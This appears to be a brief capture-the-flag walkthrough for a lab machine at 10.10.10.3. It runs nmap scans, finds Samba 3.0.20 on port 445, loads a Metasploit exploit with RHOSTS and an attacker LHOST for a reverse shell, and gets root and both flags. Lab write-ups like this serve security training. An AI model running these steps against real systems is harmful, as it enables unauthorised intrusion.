As usual, let's start with nmap
nmap -sV -sC 10.10.10.3
This tells us to use -Pn. Let's try:
nmap -sV -sC -Pn 10.10.10.3
nmap tells us that port 445 is open which is associated with Samba and the version is samba 3.0.20
Let's google "samba 3.0.20 exploit" and see if there is something available. Looks like there is one and we can access it directly from Metasploit.
Let's load Metasploit using:
search samba 3.0.20
We need to set up both RHOSTS and LHOST
set RHOSTS 10.10.10.3
10.10.10.3 is the IP of the target machine
set LHOST 10.10.14.12
LHOST is the IP of your VM. Mine is 10.10.14.12. Yours will be different
It worked! We got a shell on the target machine now.
we are root!
Congratulations! You got the user flag!
Now let's look for the root flag
Congratulations! You got the root flag!